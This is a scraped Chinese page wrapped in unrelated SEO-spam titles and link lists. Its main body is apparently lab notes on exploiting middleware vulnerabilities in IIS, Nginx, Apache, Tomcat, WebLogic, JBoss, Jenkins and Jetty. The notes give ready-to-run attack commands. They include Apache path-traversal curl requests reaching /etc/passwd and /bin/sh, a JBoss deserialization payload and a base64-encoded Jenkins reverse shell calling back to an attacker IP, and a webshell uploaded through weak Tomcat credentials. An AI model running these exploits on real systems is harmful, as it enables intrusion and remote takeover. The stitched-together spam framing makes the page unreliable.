当前位置: 首页 > news >正文

大红门做网站的公司中企动力是国企还是私企

大红门做网站的公司,中企动力是国企还是私企,wordpress 轮播图插件下载,做美食教程的网站有哪些一.中间件-IIS-短文件解析蓝屏 IIS现在用的也少了#xff0c;漏洞也基本没啥用 1、短文件#xff1a;信息收集 2、文件解析#xff1a;还有点用 3、HTTP.SYS#xff1a;蓝屏崩溃 没有和权限挂钩 4、CVE-2017-7269 条件过老 windows 2003上面的漏洞 二.中…一.中间件-IIS-短文件解析蓝屏 IIS现在用的也少了漏洞也基本没啥用 1、短文件信息收集 2、文件解析还有点用 3、HTTP.SYS蓝屏崩溃  没有和权限挂钩 4、CVE-2017-7269 条件过老 windows 2003上面的漏洞 二.中间件-Nginx-文件解析命令执行等 后缀解析 文件名解析 运行此靶场 sudo docker-compose up -d 查看启动环境 sudo docker ps Bp抓包修改文件信息添加/.php解析php代码 CVE-2013-4547文件名逻辑漏洞 CVE-2013-4547漏洞是由于非法字符空格和截止符导致Nginx在解析URL时的有限状态机混乱导致攻击者可以通过一个非编码空格绕过后缀名限制。假设服务器中存在文件123. jpg则可以通过改包访问让服务器认为访问的为PHP文件 两处将aa 61 61改为20 00 成功解析php文件 cve_2017_7529 敏感信息泄露 意义不大 CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现 Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞称为 CVE-2021-41773。同时发布了2.4.50更新修复了这个漏洞。该漏洞允许攻击者绕过路径遍历保护使用编码并读取网络服务器文件系统上的任意文件。运行此版本 Apache 的 Linux 和 Windows 服务器都受到影响。此漏洞是在 2.4.49 中引入的该补丁旨在提高 URL 验证的性能。可以通过对“.”进行编码来绕过新的验证方法。如果 Apache 网络服务器配置未设置为“要求全部拒绝”则漏洞利用相对简单。通过对这些字符进行编码并使用有效负载修改 URL可以实现经典的路径遍历。 二、影响版本 41773——版本等于2.4.4942013——版本等于2.4.49/50 curl -v --path-as-is http://123.58.224.8:8005/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd curl -v --path-as-is http://123.58.224.8:8005/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh cve-2017-9798 信息泄露  价值不高。 cve-2018-11759 价值不高。 cve-2021-37580 shenyu 插件问题。 Tomcat 1.弱口令 进入页面点击manager或直接url输入进去登录页面 哥斯拉生成jsp文件 上传木马拿到webshell 2.cve-2017-12615 Poc直接梭哈 脚本上传jsp实现cve 3.cve-2020-1938 python2 CVE-2020-1938.py 123.58.224.8 -p 57312 -f /WEB-INF/web.xml poc直接梭哈查看web-inf/目录下的文件 python CVE-2020-1938.py 123.58.224.8 -p 57312 -f /WEB-INF/web.xml 123.58.224.8:57312 CVE-2020-11996 拒绝服务漏洞 意义不大 简介Tomcat http/2 拒绝服务攻击通过恶意构造HTTP/2请求序列会在几秒钟内大量占用CPU使用率如果在并发HTTP/2连接上发出足够数量的此类请求服务器可能会变得无响应。 影响版本 Apache Tomcat 10.0.0-M1~10.0.0-M5 / 9.0.0.M1~9.0.35 / 8.5.0~8.5.55 该漏洞与获取权限无关单纯为破坏性漏洞毕竟学习漏洞不是为了搞破坏研究意义不大。 CVE-2020-9484 反序列化漏洞 条件苛刻 简介Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用自带session同步功能时使用不安全的配置没有使用EncryptInterceptor会存在反序列化漏洞攻击者通过精心构造的数据包 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 影响版本 Apache Tomcat 10.x 10.0.0-M5 / 9.x 9.0.35 / 8.x 8.5.55 / 7.x 7.0.104 此漏洞利用条件非常苛刻研究意义不大成功利用此漏洞需同时满足以下4个条件: 1.攻击者能够控制服务器上文件的内容和文件名称 2.服务器PersistenceManager配置中使用了FileStore 3.PersistenceManager中的sessionAttributeValueClassNameFilter被配置为“null”或者过滤器不够严格导致允许攻击者提供反序列化数据的对象 4.攻击者知道使用的FileStore存储位置到攻击者可控文件的相对路径 http://192.168.83.136:8080/invoker/readonly 查看返回状态码500存在漏洞 Weblogic Cve-2018 一、漏洞简介 weblogic的WLS Security组件对外提供webservice服务其中使用了XMLDecoder来解析用户传入的XML数据在解析的过程中出现反序列化漏洞导致可执行任意命令。 二、漏洞影响 影响版本 10.3.6.0.012.1.3.0.012.2.1.1.012.2.1.2.0 CVE-2018-2894 CVE-2020-14882 0x01 漏洞描述 近日Oracle WebLogic Server 远程代码执行漏洞 CVE-2020-14882POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件且该漏洞通过HTTP协议进行利用。将CVE-2020-14882和CVE-2020-14883进行组合利用后远程且未经授权的攻击者可以直接在服务端执行任意代码获取系统权限 0x02  漏洞影响 Oracle WebLogic Server版本10.3.6.012.1.3.012.2.1.312.2.1.414.1.1.0 CVE-2018-2628 扫到了cve-2016-3510什么鬼 Jboss CVE-2017-7504 1.javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java 2.java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.83.159:2222 IP是攻击机ip,port是要监听的端口) curl http://192.168.83.136:8080/invoker/readonly --data-binary ReverseShellCommonsCollectionsHashMap.ser CVE-2017-12149 http://192.168.83.136:8080/invoker/readonly 返回500 中间件-Jenkins-CVE CVE-2017-1000353  远程代码执行漏洞 192.168.83.159:2222 //生成序列化字符串poc.ser,这里反弹shell命令需要用base编码 java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar poc.ser bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjgzLjE1OS8yMjIyIDAJjE}|{base64,-d}|{bash,-i} //给靶机发送数据包执行命令 python3 exploit.py http://192.168.83.136:8080 poc.ser CVE-2018-1000861 python2 exp.py http://192.168.83.136:8080/ touch /tmp/cve-2018-1000861-GitNBExp sudo docker exec -it d63ffa245393    /bin/bash jetty curl -v http://192.168.83.136:8080/%2e/WEB-INF/web.xml 查看一些铭感信息 CVE-2021-28169 也是c查看web-inf http://192.168.83.136:8080/static?/%2557EB-INF/web.xml CVE-2021-34429 GET /%u002e/WEB-INF/web.xml HTTP/1.1 Host: 192.168.83.136:8080 Docker -是否存在.dockerenv文件 ls -alh /.dockerenv -查询系统进程的cgroup信息 cat /proc/1/cgroup 真实机执行命令 运行此靶场 sudo docker-compose up -d 查看启动环境 sudo docker ps 关闭环境 sudo docker-compose down
http://www.hkea.cn/news/14534095/

相关文章:

  • 建站网络建立科技开发网站 留言板 制作
  • 那些网站可以做团购宁波seo推广优化怎么做
  • 广州市网站设计dede织梦仿站网站建设
  • 公司网站开发完成后怎么办wordpress框架是什么意思
  • 冶金建设网站开课啦wordpress主题下载
  • 创建自己网站的步骤石家庄最好的网站建设公司哪家好
  • 安卓盒子做网站网站设计可以吗
  • 精选微信网站建设推广赚钱网
  • 网站做支付需要准备什么条件网站制作器手机版下载
  • python做的大型网站代码解决wordpress不能发邮件
  • 电子商务网站建设的方法有哪些wordpress 搜索结果分页
  • 建设网站公司哪好我的网站模板下载
  • 建设直播平台网站软件app开发开发公司
  • 杭州个人网站建设北京牛鼻子网站建设公司
  • 多用户商城系统网站建设wordpress 最新文章调用
  • 个人网站创意西安建设工程信息网官网xiancin
  • 网站的开发语言有哪些网站设计谈判
  • 做网站服务器配置怎么选专业旅游网站制作
  • 杭州手机网站建设公司中国十大猎头公司介绍
  • 网站建设江阴注册公司要哪些条件费用
  • 游戏网站建设流程图新开传奇网站刚开一秒
  • 临沂网站设计哪家好torrent种子猫
  • 金坛网站制作青岛网站建设公
  • 网站建设补充宝应县住房建设局网站
  • 北京网站建设app开发外链吧
  • 温江建设网站一般网站的字体大小
  • 阿里云做淘宝客网站吗临沧市住房和城乡建设局门户网站
  • 电子商务网站建设与运营的试题什么是友情链接?
  • 汝南专业网站建设wordpress 慢的上天
  • 制作相册成都网络推广优化